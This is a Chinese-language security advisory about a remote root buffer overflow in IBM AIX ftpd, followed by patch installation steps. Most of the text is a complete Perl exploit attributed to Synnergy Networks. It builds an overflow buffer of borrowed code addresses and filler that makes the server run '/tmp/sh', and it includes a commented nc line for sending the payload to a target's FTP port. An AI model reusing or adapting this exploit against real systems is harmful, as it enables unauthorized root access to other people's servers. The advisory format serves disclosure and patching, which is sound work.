AIX ftpd存在着远程溢出漏洞发布时间:1999-12-01 更新时间:1999-12-01 严重程度:高 威胁程度:远程管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 IBM AIX 4.3.2;4.3.1;4.3详细描述 AIX的FTPD存在着一个远程缓冲溢出漏洞允许远程用户获得ROOT权利. 测试代码 #!/usr/bin/perl # *** Synnergy Networks $bufstart = 0x2ff22724; # this is our first guess $nop = "\xde\xad\xca\xfe"; $buf = "CEL "; $buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of # 'borrowed' code $buf .= pack ("N", $bufstart); # 4 $buf .= "\xd0\x04\x06\xd4"; # 8 system call.. $buf .= "\xf0\x14\x63\x5c"; # c TOC $offset = 0x10; while ($offset < 0x3c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x008); $offset += 4; while ($offset < 0x110) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x204) { $offset += 4; $buf .= $nop; } $buf .= "\x10\x01\x01\x50"; $offset += 4; while ($offset < 0x210) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x23c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x240); $offset += 4; while ($offset < 0x240) { $offset += 4; $buf .= $nop; } # this is the command that will be run through system $buf .= "/tmp/sh"; $buf .= "\n"; # offcourse you should change this . # open F, "| nc -v -v -n 192.168.2.12 21"; open F, "| od -tx1"; printf F $buf; close F; # EOF 解决方案 下载临时补丁ftp://aix.software.ibm.com/aix/efixes/security/ft pd.tar.Z 下载后按以下步骤进行 1. Uncompress and extract the fix. # uncompress < ftpd.tar.Z | tar xf - # cd ftpd 2. Replace the vulnerable ftpd. # mv /usr/sbin/ftpd /usr/sbin/ftpd.before_security_ fix # chown root.system /usr/sbin/ftpd.before_security_fix # chmod 0 /usr/sbin/ftpd.before_security_fix # cp ./ftpd /usr/sbin/ftpd # chown root.system /usr/sbin/ftpd # chmod 4554 /usr/sbin/ftpd 相关信息 |
